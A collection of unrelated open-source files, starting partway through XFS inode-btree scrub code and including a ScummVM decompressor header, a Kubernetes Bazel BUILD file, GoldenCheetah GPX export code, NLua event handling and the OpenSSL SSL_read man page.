(!xfs_scrub_iallocbt_chunk(bs, &irec, agino, len)) break; holemask >>= 1; agino += XFS_INODES_PER_HOLEMASK_BIT; } if (holecount > XFS_INODES_PER_CHUNK || holecount + irec.ir_count != XFS_INODES_PER_CHUNK) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); check_freemask: error = xfs_scrub_iallocbt_check_freemask(bs, &irec); if (error) goto out; out: return error; } /* * Make sure the inode btrees are as large as the rmap thinks they are. * Don't bother if we're missing btree cursors, as we're already corrupt. */ STATIC void xfs_scrub_iallocbt_xref_rmap_btreeblks( struct xfs_scrub_context *sc, int which) { struct xfs_owner_info oinfo; xfs_filblks_t blocks; xfs_extlen_t inobt_blocks = 0; xfs_extlen_t finobt_blocks = 0; int error; if (!sc->sa.ino_cur || !sc->sa.rmap_cur || (xfs_sb_version_hasfinobt(&sc->mp->m_sb) && !sc->sa.fino_cur) || xfs_scrub_skip_xref(sc->sm)) return; /* Check that we saw as many inobt blocks as the rmap says. */ error = xfs_btree_count_blocks(sc->sa.ino_cur, &inobt_blocks); if (!xfs_scrub_process_error(sc, 0, 0, &error)) return; if (sc->sa.fino_cur) { error = xfs_btree_count_blocks(sc->sa.fino_cur, &finobt_blocks); if (!xfs_scrub_process_error(sc, 0, 0, &error)) return; } xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INOBT); error = xfs_scrub_count_rmap_ownedby_ag(sc, sc->sa.rmap_cur, &oinfo, &blocks); if (!xfs_scrub_should_check_xref(sc, &error, &sc->sa.rmap_cur)) return; if (blocks != inobt_blocks + finobt_blocks) xfs_scrub_btree_set_corrupt(sc, sc->sa.ino_cur, 0); } /* * Make sure that the inobt records point to the same number of blocks as * the rmap says are owned by inodes. */ STATIC void xfs_scrub_iallocbt_xref_rmap_inodes( struct xfs_scrub_context *sc, int which, xfs_filblks_t inode_blocks) { struct xfs_owner_info oinfo; xfs_filblks_t blocks; int error; if (!sc->sa.rmap_cur || xfs_scrub_skip_xref(sc->sm)) return; /* Check that we saw as many inode blocks as the rmap knows about. */ xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INODES); error = xfs_scrub_count_rmap_ownedby_ag(sc, sc->sa.rmap_cur, &oinfo, &blocks); if (!xfs_scrub_should_check_xref(sc, &error, &sc->sa.rmap_cur)) return; if (blocks != inode_blocks) xfs_scrub_btree_xref_set_corrupt(sc, sc->sa.rmap_cur, 0); } /* Scrub the inode btrees for some AG. */ STATIC int xfs_scrub_iallocbt( struct xfs_scrub_context *sc, xfs_btnum_t which) { struct xfs_btree_cur *cur; struct xfs_owner_info oinfo; xfs_filblks_t inode_blocks = 0; int error; xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INOBT); cur = which == XFS_BTNUM_INO ? sc->sa.ino_cur : sc->sa.fino_cur; error = xfs_scrub_btree(sc, cur, xfs_scrub_iallocbt_rec, &oinfo, &inode_blocks); if (error) return error; xfs_scrub_iallocbt_xref_rmap_btreeblks(sc, which); /* * If we're scrubbing the inode btree, inode_blocks is the number of * blocks pointed to by all the inode chunk records. Therefore, we * should compare to the number of inode chunk blocks that the rmap * knows about. We can't do this for the finobt since it only points * to inode chunks with free inodes. */ if (which == XFS_BTNUM_INO) xfs_scrub_iallocbt_xref_rmap_inodes(sc, which, inode_blocks); return error; } int xfs_scrub_inobt( struct xfs_scrub_context *sc) { return xfs_scrub_iallocbt(sc, XFS_BTNUM_INO); } int xfs_scrub_finobt( struct xfs_scrub_context *sc) { return xfs_scrub_iallocbt(sc, XFS_BTNUM_FINO); } /* See if an inode btree has (or doesn't have) an inode chunk record. */ static inline void xfs_scrub_xref_inode_check( struct xfs_scrub_context *sc, xfs_agblock_t agbno, xfs_extlen_t len, struct xfs_btree_cur **icur, bool should_have_inodes) { bool has_inodes; int error; if (!(*icur) || xfs_scrub_skip_xref(sc->sm)) return; error = xfs_ialloc_has_inodes_at_extent(*icur, agbno, len, &has_inodes); if (!xfs_scrub_should_check_xref(sc, &error, icur)) return; if (has_inodes != should_have_inodes) xfs_scrub_btree_xref_set_corrupt(sc, *icur, 0); } /* xref check that the extent is not covered by inodes */ void xfs_scrub_xref_is_not_inode_chunk( struct xfs_scrub_context *sc, xfs_agblock_t agbno, xfs_extlen_t len) { xfs_scrub_xref_inode_check(sc, agbno, len, &sc->sa.ino_cur, false); xfs_scrub_xref_inode_check(sc, agbno, len, &sc->sa.fino_cur, false); } /* xref check that the extent is covered by inodes */ void xfs_scrub_xref_is_inode_chunk( struct xfs_scrub_context *sc, xfs_agblock_t agbno, xfs_extlen_t len) { xfs_scrub_xref_inode_check(sc, agbno, len, &sc->sa.ino_cur, true); }
{ "pile_set_name": "Github" }
!function(){var i=0;with(obj){i+=i+=10}}()
{ "pile_set_name": "Github" }
/* ScummVM - Graphic Adventure Engine * * ScummVM is the legal property of its developers, whose names * are too numerous to list here. Please refer to the COPYRIGHT * file distributed with this source distribution. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. * */ #ifndef MADE_REDREADER_H #define MADE_REDREADER_H #include "common/scummsys.h" namespace Common { class SeekableReadStream; class File; } namespace Made { class RedReader { public: Common::SeekableReadStream *load(const char *redFilename, const char *filename); static Common::SeekableReadStream *loadFromRed(const char *redFilename, const char *filename); private: struct FileEntry { uint32 compSize, origSize; }; bool seekFile(Common::File &fd, FileEntry &fileEntry, const char *filename); }; const uint BITBUFSIZ = 16; const uint DICBIT = 13; const uint DICSIZ = 1 << DICBIT; const uint MATCHBIT = 8; const uint MAXMATCH = 256; const uint THRESHOLD = 3; const uint NC = 255 + MAXMATCH + 2 - THRESHOLD; const uint CBIT = 9; const uint CODE_BIT = 16; const uint NP = DICBIT + 1; const int NT = CODE_BIT + 3; const uint PBIT = 4; const uint TBIT = 5; const uint NPT = NT; class LzhDecompressor { public: LzhDecompressor(); ~LzhDecompressor(); int decompress(Common::SeekableReadStream &source, byte *dest, uint32 compSize, uint32 origSize); private: Common::SeekableReadStream *_source; uint32 _compSize, _blockPos; uint16 _bitbuf; uint _subbitbuf; int _bitcount; uint16 _left[2 * NC - 1], _right[2 * NC - 1]; byte _c_len[NC], _pt_len[NPT]; uint _blocksize; uint16 _c_table[4096], _pt_table[256]; int tree_n, heapsize; short heap[NC + 1]; uint16 *freq, *sortptr, len_cnt[17]; byte *len_table; int decode_i, decode_j; int count_len_depth; byte readByte(); void fillbuf(int count); uint getbits(int count); void init_getbits(); void decode_start(); void decode(uint count, byte text[]); void huf_decode_start(); unsigned int decode_c(); unsigned int decode_p(); void read_pt_len(int nn, int nbit, int i_special); void read_c_len(); void count_len(int i); void make_len(int root); void downheap(int i); void make_code(int n, byte len[], uint16 code[]); void make_table(uint nchar, byte bitlen[], uint tablebits, uint16 table[]); int make_tree(int nparm, uint16 freqparm[], byte lenparm[], uint16 codeparm[]); }; } // End of namespace Made #endif /* MADE_H */
{ "pile_set_name": "Github" }
package(default_visibility = ["//visibility:public"]) load( "@io_bazel_rules_go//go:def.bzl", "go_library", "go_test", ) go_test( name = "go_default_test", srcs = ["storage_test.go"], embed = [":go_default_library"], deps = [ "//pkg/apis/autoscaling:go_default_library", "//pkg/apis/core:go_default_library", "//pkg/registry/registrytest:go_default_library", "//vendor/k8s.io/apimachinery/pkg/api/equality:go_default_library", "//vendor/k8s.io/apimachinery/pkg/api/errors:go_default_library", "//vendor/k8s.io/apimachinery/pkg/apis/meta/v1:go_default_library", "//vendor/k8s.io/apimachinery/pkg/fields:go_default_library", "//vendor/k8s.io/apimachinery/pkg/labels:go_default_library", "//vendor/k8s.io/apimachinery/pkg/runtime:go_default_library", "//vendor/k8s.io/apimachinery/pkg/util/diff:go_default_library", "//vendor/k8s.io/apiserver/pkg/endpoints/request:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic/testing:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/rest:go_default_library", "//vendor/k8s.io/apiserver/pkg/storage/etcd/testing:go_default_library", ], ) go_library( name = "go_default_library", srcs = ["storage.go"], importpath = "k8s.io/kubernetes/pkg/registry/core/replicationcontroller/storage", deps = [ "//pkg/apis/autoscaling:go_default_library", "//pkg/apis/autoscaling/v1:go_default_library", "//pkg/apis/autoscaling/validation:go_default_library", "//pkg/apis/core:go_default_library", "//pkg/apis/extensions/v1beta1:go_default_library", "//pkg/printers:go_default_library", "//pkg/printers/internalversion:go_default_library", "//pkg/printers/storage:go_default_library", "//pkg/registry/core/replicationcontroller:go_default_library", "//vendor/k8s.io/apimachinery/pkg/api/errors:go_default_library", "//vendor/k8s.io/apimachinery/pkg/apis/meta/v1:go_default_library", "//vendor/k8s.io/apimachinery/pkg/labels:go_default_library", "//vendor/k8s.io/apimachinery/pkg/runtime:go_default_library", "//vendor/k8s.io/apimachinery/pkg/runtime/schema:go_default_library", "//vendor/k8s.io/apiserver/pkg/endpoints/request:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/generic/registry:go_default_library", "//vendor/k8s.io/apiserver/pkg/registry/rest:go_default_library", ], ) filegroup( name = "package-srcs", srcs = glob(["**"]), tags = ["automanaged"], visibility = ["//visibility:private"], ) filegroup( name = "all-srcs", srcs = [":package-srcs"], tags = ["automanaged"], )
{ "pile_set_name": "Github" }
/* * Copyright (c) 2010 Greg Lonnon ([email protected]) copied from TcxRideFile.cpp * * Copyright (c) 2008 Sean C. Rhea ([email protected]), * J.T Conklin ([email protected]) * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the Free * Software Foundation; either version 2 of the License, or (at your option) * any later version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., 51 * Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ #include "GpxRideFile.h" #include "GpxParser.h" #include "GcUpgrade.h" #include <QDomDocument> static int gpxFileReaderRegistered = RideFileFactory::instance().registerReader( "gpx", "GPS Exchange format", new GpxFileReader()); RideFile *GpxFileReader::openRideFile(QFile &file, QStringList &errors, QList<RideFile*>*) const { (void) errors; RideFile *rideFile = new RideFile(); rideFile->setRecIntSecs(1.0); //rideFile->setDeviceType("GPS Exchange Format"); rideFile->setFileFormat("GPS Exchange Format (gpx)"); GpxParser handler(rideFile); QXmlInputSource source (&file); QXmlSimpleReader reader; reader.setContentHandler (&handler); reader.parse (source); return rideFile; } QByteArray GpxFileReader::toByteArray(Context *, const RideFile *ride, bool withAlt, bool withWatts, bool withHr, bool withCad) const { // // GPX Standard defined here: http://www.topografix.com/GPX/1/1/ // QDomDocument doc; QDomProcessingInstruction hdr = doc.createProcessingInstruction("xml","version=\"1.0\""); doc.appendChild(hdr); QDomElement gpx = doc.createElementNS("http://www.topografix.com/GPX/1/1", "gpx"); gpx.setAttribute("xmlns:xsi", "http://www.w3.org/2001/XMLSchema-instance"); gpx.setAttribute("xmlns:gpxtpx", "http://www.garmin.com/xmlschemas/TrackPointExtension/v1"); gpx.setAttribute("xmlns:gpxpx", "http://www.garmin.com/xmlschemas/PowerExtension/v1"); gpx.setAttribute("xsi:schemaLocation", "http://www.topografix.com/GPX/1/1" " " "http://www.topografix.com/GPX/1/1/gpx.xsd" " " "http://www.garmin.com/xmlschemas/TrackPointExtension/v1" " " "http://www.garmin.com/xmlschemas/TrackPointExtensionv1.xsd" " " "http://www.garmin.com/xmlschemas/PowerExtension/v1" " " "http://www.garmin.com/xmlschemas/PowerExtensionv1.xsd" ); gpx.setAttribute("version", "1.1"); gpx.setAttribute("creator", QString("GoldenCheetah (build %1)").arg(VERSION_LATEST)); doc.appendChild(gpx); // If we have data points, we'll have a <trk> and in that a <trkseg> and in that a bunch of <trkpt> if (!ride->dataPoints().empty()) { QDomElement trk = doc.createElement("trk"); gpx.appendChild(trk); QDomElement trkseg = doc.createElement("trkseg"); trk.appendChild(trkseg); QLocale cLocale(QLocale::Language::C); foreach (const RideFilePoint *point, ride->dataPoints()) { QDomElement trkpt = doc.createElement("trkpt"); trkseg.appendChild(trkpt); QString strLat = cLocale.toString(point->lat, 'g', 12); trkpt.setAttribute("lat", strLat); QString strLon = cLocale.toString(point->lon, 'g', 12); trkpt.setAttribute("lon", strLon); // GPX standard requires <ele>, if present, to be first if (withAlt && ride->areDataPresent()->alt) { QDomElement ele = doc.createElement("ele"); //QDomText text = doc.createTextNode(QString("%1").arg(point->alt, 0, 'f', 1)); //ele.appendChild(text); ele.appendChild(doc.createTextNode(QString("%1").arg(point->alt, 0, 'f', 1))); trkpt.appendChild(ele); } // GPX standard requires <time>, if present, to come next if (ride->areDataPresent()->secs && point->secs >= 0) { QDomElement tm = doc.createElement("time"); QDomText text = doc.createTextNode(ride->startTime().toUTC().addSecs(point->secs).toString(Qt::ISODate)); tm.appendChild(text); trkpt.appendChild(tm); } // Extra things, if any, need to go into an <extensions> tag QDomElement gpxtpx_atemp; // temperature QDomElement gpxtpx_hr; // HR QDomElement gpxtpx_cad; // cadance QDomElement pwr_PowerInWatts; // power if (ride->areDataPresent()->temp && point->temp > -200) { gpxtpx_atemp = doc.createElement("gpxtpx:atemp"); gpxtpx_atemp.appendChild(doc.createTextNode(QString("%1").arg(point->temp, 0, 'f', 1))); } if (withHr && ride->areDataPresent()->hr) { gpxtpx_hr = doc.createElement("gpxtpx:hr"); gpxtpx_hr.appendChild(doc.createTextNode(QString("%1").arg(point->hr, 0, 'f', 0))); } if (withCad && ride->areDataPresent()->cad && point->cad < 255) { gpxtpx_cad = doc.createElement("gpxtpx:cad"); gpxtpx_cad.appendChild(doc.createTextNode(QString("%1").arg(point->cad, 0, 'f', 0))); } if (withWatts && ride->areDataPresent()->watts) { pwr_PowerInWatts = doc.createElement("pwr:PowerInWatts"); pwr_PowerInWatts.setAttribute("xmlns:pwr", "http://www.garmin.com/xmlschemas/PowerExtension/v1"); pwr_PowerInWatts.appendChild(doc.createTextNode(QString("%1").arg(point->watts, 0, 'f', 0))); } // If we have at least one from among TEMP, CAD, and HR, we need a <gpxtpx:TrackPointExtension> tag QDomElement gpxtpx_TrackPointExtension; if (!gpxtpx_atemp.isNull() || !gpxtpx_cad.isNull() || !gpxtpx_hr.isNull()) { gpxtpx_TrackPointExtension = doc.createElement("gpxtpx:TrackPointExtension"); // These must go in this order, as per http://www8.garmin.com/xmlschemas/TrackPointExtensionv1.xsd if (!gpxtpx_atemp.isNull()) gpxtpx_TrackPointExtension.appendChild(gpxtpx_atemp); if (!gpxtpx_hr.isNull()) gpxtpx_TrackPointExtension.appendChild(gpxtpx_hr); if (!gpxtpx_cad.isNull()) gpxtpx_TrackPointExtension.appendChild(gpxtpx_cad); } // If we have gpxtpx_TrackPointExtension and/or pwr_PowerInWatts, we need an <extension> tag to hold them. if (! gpxtpx_TrackPointExtension.isNull() || !pwr_PowerInWatts.isNull()) { QDomElement extensions = doc.createElement("extensions"); trkpt.appendChild(extensions); if (! gpxtpx_TrackPointExtension.isNull()) extensions.appendChild(gpxtpx_TrackPointExtension); if (!pwr_PowerInWatts.isNull()) extensions.appendChild(pwr_PowerInWatts); } } } return doc.toByteArray(4); } bool GpxFileReader::writeRideFile(Context *context, const RideFile *ride, QFile &file) const { QByteArray xml = toByteArray(context, ride, true, true, true, true); if (!file.open(QIODevice::WriteOnly)) return(false); file.resize(0); QTextStream out(&file); out.setCodec("UTF-8"); //out.setGenerateByteOrderMark(true); out << xml; out.flush(); file.close(); return(true); }
{ "pile_set_name": "Github" }
/* * This file is part of NLua. * * Copyright (C) 2003-2005 Fabio Mascarenhas de Queiroz. * Copyright (C) 2012 Megax <http://megax.yeahunter.hu/> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ using System; using System.Reflection; namespace NLua.Method { /* * Wrapper class for events that does registration/deregistration * of event handlers. * * Author: Fabio Mascarenhas * Version: 1.0 */ class RegisterEventHandler { private EventHandlerContainer pendingEvents; private EventInfo eventInfo; private object target; public RegisterEventHandler (EventHandlerContainer pendingEvents, object target, EventInfo eventInfo) { this.target = target; this.eventInfo = eventInfo; this.pendingEvents = pendingEvents; } /* * Adds a new event handler */ public Delegate Add (LuaFunction function) { //CP: Fix by Ben Bryant for event handling with one parameter //link: http://luaforge.net/forum/message.php?msg_id=9266 Delegate handlerDelegate = CodeGeneration.Instance.GetDelegate (eventInfo.EventHandlerType, function); eventInfo.AddEventHandler (target, handlerDelegate); pendingEvents.Add (handlerDelegate, this); return handlerDelegate; } /* * Removes an existing event handler */ public void Remove (Delegate handlerDelegate) { RemovePending (handlerDelegate); pendingEvents.Remove (handlerDelegate); } /* * Removes an existing event handler (without updating the pending handlers list) */ internal void RemovePending (Delegate handlerDelegate) { eventInfo.RemoveEventHandler (target, handlerDelegate); } } }
{ "pile_set_name": "Github" }
.\" Automatically generated by Pod::Man 4.14 (Pod::Simple 3.40) .\" .\" Standard preamble: .\" ======================================================================== .de Sp \" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Vb \" Begin verbatim text .ft CW .nf .ne \\$1 .. .de Ve \" End verbatim text .ft R .fi .. .\" Set up some character translations and predefined strings. \*(-- will .\" give an unbreakable dash, \*(PI will give pi, \*(L" will give a left .\" double quote, and \*(R" will give a right double quote. \*(C+ will .\" give a nicer C++. Capital omega is used to do unbreakable dashes and .\" therefore won't be available. \*(C` and \*(C' expand to `' in nroff, .\" nothing in troff, for use with C<>. .tr \(*W- .ds C+ C\v'-.1v'\h'-1p'\s-2+\h'-1p'+\s0\v'.1v'\h'-1p' .ie n \{\ . ds -- \(*W- . ds PI pi . if (\n(.H=4u)&(1m=24u) .ds -- \(*W\h'-12u'\(*W\h'-12u'-\" diablo 10 pitch . if (\n(.H=4u)&(1m=20u) .ds -- \(*W\h'-12u'\(*W\h'-8u'-\" diablo 12 pitch . ds L" "" . ds R" "" . ds C` "" . ds C' "" 'br\} .el\{\ . ds -- \|\(em\| . ds PI \(*p . ds L" `` . ds R" '' . ds C` . ds C' 'br\} .\" .\" Escape single quotes in literal strings from groff's Unicode transform. .ie \n(.g .ds Aq \(aq .el .ds Aq ' .\" .\" If the F register is >0, we'll generate index entries on stderr for .\" titles (.TH), headers (.SH), subsections (.SS), items (.Ip), and index .\" entries marked with X<> in POD. Of course, you'll have to process the .\" output yourself in some meaningful fashion. .\" .\" Avoid warning from groff about undefined register 'F'. .de IX .. .nr rF 0 .if \n(.g .if rF .nr rF 1 .if (\n(rF:(\n(.g==0)) \{\ . if \nF \{\ . de IX . tm Index:\\$1\t\\n%\t"\\$2" .. . if !\nF==2 \{\ . nr % 0 . nr F 2 . \} . \} .\} .rr rF .\" .\" Accent mark definitions (@(#)ms.acc 1.5 88/02/08 SMI; from UCB 4.2). .\" Fear. Run. Save yourself. No user-serviceable parts. . \" fudge factors for nroff and troff .if n \{\ . ds #H 0 . ds #V .8m . ds #F .3m . ds #[ \f1 . ds #] \fP .\} .if t \{\ . ds #H ((1u-(\\\\n(.fu%2u))*.13m) . ds #V .6m . ds #F 0 . ds #[ \& . ds #] \& .\} . \" simple accents for nroff and troff .if n \{\ . ds ' \& . ds ` \& . ds ^ \& . ds , \& . ds ~ ~ . ds / .\} .if t \{\ . ds ' \\k:\h'-(\\n(.wu*8/10-\*(#H)'\'\h"|\\n:u" . ds ` \\k:\h'-(\\n(.wu*8/10-\*(#H)'\`\h'|\\n:u' . ds ^ \\k:\h'-(\\n(.wu*10/11-\*(#H)'^\h'|\\n:u' . ds , \\k:\h'-(\\n(.wu*8/10)',\h'|\\n:u' . ds ~ \\k:\h'-(\\n(.wu-\*(#H-.1m)'~\h'|\\n:u' . ds / \\k:\h'-(\\n(.wu*8/10-\*(#H)'\z\(sl\h'|\\n:u' .\} . \" troff and (daisy-wheel) nroff accents .ds : \\k:\h'-(\\n(.wu*8/10-\*(#H+.1m+\*(#F)'\v'-\*(#V'\z.\h'.2m+\*(#F'.\h'|\\n:u'\v'\*(#V' .ds 8 \h'\*(#H'\(*b\h'-\*(#H' .ds o \\k:\h'-(\\n(.wu+\w'\(de'u-\*(#H)/2u'\v'-.3n'\*(#[\z\(de\v'.3n'\h'|\\n:u'\*(#] .ds d- \h'\*(#H'\(pd\h'-\w'~'u'\v'-.25m'\f2\(hy\fP\v'.25m'\h'-\*(#H' .ds D- D\\k:\h'-\w'D'u'\v'-.11m'\z\(hy\v'.11m'\h'|\\n:u' .ds th \*(#[\v'.3m'\s+1I\s-1\v'-.3m'\h'-(\w'I'u*2/3)'\s-1o\s+1\*(#] .ds Th \*(#[\s+2I\s-2\h'-\w'I'u*3/5'\v'-.3m'o\v'.3m'\*(#] .ds ae a\h'-(\w'a'u*4/10)'e .ds Ae A\h'-(\w'A'u*4/10)'E . \" corrections for vroff .if v .ds ~ \\k:\h'-(\\n(.wu*9/10-\*(#H)'\s-2\u~\d\s+2\h'|\\n:u' .if v .ds ^ \\k:\h'-(\\n(.wu*10/11-\*(#H)'\v'-.4m'^\v'.4m'\h'|\\n:u' . \" for low resolution devices (crt and lpr) .if \n(.H>23 .if \n(.V>19 \ \{\ . ds : e . ds 8 ss . ds o a . ds d- d\h'-1'\(ga . ds D- D\h'-1'\(hy . ds th \o'bp' . ds Th \o'LP' . ds ae ae . ds Ae AE .\} .rm #[ #] #H #V #F C .\" ======================================================================== .\" .IX Title "SSL_READ 3" .TH SSL_READ 3 "2020-09-22" "1.1.1h" "OpenSSL" .\" For nroff, turn off justification. Always turn off hyphenation; it makes .\" way too many mistakes in technical documents. .if n .ad l .nh .SH "NAME" SSL_read_ex, SSL_read, SSL_peek_ex, SSL_peek \&\- read bytes from a TLS/SSL connection .SH "SYNOPSIS" .IX Header "SYNOPSIS" .Vb 1 \& #include <openssl/ssl.h> \& \& int SSL_read_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); \& int SSL_read(SSL *ssl, void *buf, int num); \& \& int SSL_peek_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); \& int SSL_peek(SSL *ssl, void *buf, int num); .Ve .SH "DESCRIPTION" .IX Header "DESCRIPTION" \&\fBSSL_read_ex()\fR and \fBSSL_read()\fR try to read \fBnum\fR bytes from the specified \fBssl\fR into the buffer \fBbuf\fR. On success \fBSSL_read_ex()\fR will store the number of bytes actually read in \fB*readbytes\fR. .PP \&\fBSSL_peek_ex()\fR and \fBSSL_peek()\fR are identical to \fBSSL_read_ex()\fR and \fBSSL_read()\fR respectively except no bytes are actually removed from the underlying \s-1BIO\s0 during the read, so that a subsequent call to \fBSSL_read_ex()\fR or \fBSSL_read()\fR will yield at least the same bytes. .SH "NOTES" .IX Header "NOTES" In the paragraphs below a \*(L"read function\*(R" is defined as one of \fBSSL_read_ex()\fR, \&\fBSSL_read()\fR, \fBSSL_peek_ex()\fR or \fBSSL_peek()\fR. .PP If necessary, a read function will negotiate a \s-1TLS/SSL\s0 session, if not already explicitly performed by \fBSSL_connect\fR\|(3) or \fBSSL_accept\fR\|(3). If the peer requests a re-negotiation, it will be performed transparently during the read function operation. The behaviour of the read functions depends on the underlying \s-1BIO.\s0 .PP For the transparent negotiation to succeed, the \fBssl\fR must have been initialized to client or server mode. This is being done by calling \&\fBSSL_set_connect_state\fR\|(3) or \fBSSL_set_accept_state()\fR before the first invocation of a read function. .PP The read functions work based on the \s-1SSL/TLS\s0 records. The data are received in records (with a maximum record size of 16kB). Only when a record has been completely received, can it be processed (decryption and check of integrity). Therefore, data that was not retrieved at the last read call can still be buffered inside the \s-1SSL\s0 layer and will be retrieved on the next read call. If \fBnum\fR is higher than the number of bytes buffered then the read functions will return with the bytes buffered. If no more bytes are in the buffer, the read functions will trigger the processing of the next record. Only when the record has been received and processed completely will the read functions return reporting success. At most the contents of one record will be returned. As the size of an \s-1SSL/TLS\s0 record may exceed the maximum packet size of the underlying transport (e.g. \s-1TCP\s0), it may be necessary to read several packets from the transport layer before the record is complete and the read call can succeed. .PP If \fB\s-1SSL_MODE_AUTO_RETRY\s0\fR has been switched off and a non-application data record has been processed, the read function can return and set the error to \&\fB\s-1SSL_ERROR_WANT_READ\s0\fR. In this case there might still be unprocessed data available in the \fB\s-1BIO\s0\fR. If read ahead was set using \fBSSL_CTX_set_read_ahead\fR\|(3), there might also still be unprocessed data available in the \fB\s-1SSL\s0\fR. This behaviour can be controlled using the \fBSSL_CTX_set_mode\fR\|(3) call. .PP If the underlying \s-1BIO\s0 is \fBblocking\fR, a read function will only return once the read operation has been finished or an error occurred, except when a non-application data record has been processed and \fB\s-1SSL_MODE_AUTO_RETRY\s0\fR is not set. Note that if \fB\s-1SSL_MODE_AUTO_RETRY\s0\fR is set and only non-application data is available the call will hang. .PP If the underlying \s-1BIO\s0 is \fBnonblocking\fR, a read function will also return when the underlying \s-1BIO\s0 could not satisfy the needs of the function to continue the operation. In this case a call to \fBSSL_get_error\fR\|(3) with the return value of the read function will yield \fB\s-1SSL_ERROR_WANT_READ\s0\fR or \&\fB\s-1SSL_ERROR_WANT_WRITE\s0\fR. As at any time it's possible that non-application data needs to be sent, a read function can also cause write operations. The calling process then must repeat the call after taking appropriate action to satisfy the needs of the read function. The action depends on the underlying \s-1BIO.\s0 When using a nonblocking socket, nothing is to be done, but \fBselect()\fR can be used to check for the required condition. When using a buffering \s-1BIO,\s0 like a \s-1BIO\s0 pair, data must be written into or retrieved out of the \s-1BIO\s0 before being able to continue. .PP \&\fBSSL_pending\fR\|(3) can be used to find out whether there are buffered bytes available for immediate retrieval. In this case the read function can be called without blocking or actually receiving new data from the underlying socket. .SH "RETURN VALUES" .IX Header "RETURN VALUES" \&\fBSSL_read_ex()\fR and \fBSSL_peek_ex()\fR will return 1 for success or 0 for failure. Success means that 1 or more application data bytes have been read from the \s-1SSL\s0 connection. Failure means that no bytes could be read from the \s-1SSL\s0 connection. Failures can be retryable (e.g. we are waiting for more bytes to be delivered by the network) or non-retryable (e.g. a fatal network error). In the event of a failure call \fBSSL_get_error\fR\|(3) to find out the reason which indicates whether the call is retryable or not. .PP For \fBSSL_read()\fR and \fBSSL_peek()\fR the following return values can occur: .IP "> 0" 4 .IX Item "> 0" The read operation was successful. The return value is the number of bytes actually read from the \s-1TLS/SSL\s0 connection. .IP "<= 0" 4 .IX Item "<= 0" The read operation was not successful, because either the connection was closed, an error occurred or action must be taken by the calling process. Call \fBSSL_get_error\fR\|(3) with the return value \fBret\fR to find out the reason. .Sp Old documentation indicated a difference between 0 and \-1, and that \-1 was retryable. You should instead call \fBSSL_get_error()\fR to find out if it's retryable. .SH "SEE ALSO" .IX Header "SEE ALSO" \&\fBSSL_get_error\fR\|(3), \fBSSL_write_ex\fR\|(3), \&\fBSSL_CTX_set_mode\fR\|(3), \fBSSL_CTX_new\fR\|(3), \&\fBSSL_connect\fR\|(3), \fBSSL_accept\fR\|(3) \&\fBSSL_set_connect_state\fR\|(3), \&\fBSSL_pending\fR\|(3), \&\fBSSL_shutdown\fR\|(3), \fBSSL_set_shutdown\fR\|(3), \&\fBssl\fR\|(7), \fBbio\fR\|(7) .SH "HISTORY" .IX Header "HISTORY" The \fBSSL_read_ex()\fR and \fBSSL_peek_ex()\fR functions were added in OpenSSL 1.1.1. .SH "COPYRIGHT" .IX Header "COPYRIGHT" Copyright 2000\-2020 The OpenSSL Project Authors. All Rights Reserved. .PP Licensed under the OpenSSL license (the \*(L"License\*(R"). You may not use this file except in compliance with the License. You can obtain a copy in the file \s-1LICENSE\s0 in the source distribution or at <https://www.openssl.org/source/license.html>.
{ "pile_set_name": "Github" }
/* Copyright 2020 Nick Brassel (tzarc) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ #pragma once // #define CH_CFG_OPTIMIZE_SPEED TRUE #include_next "chconf.h"
{ "pile_set_name": "Github" }
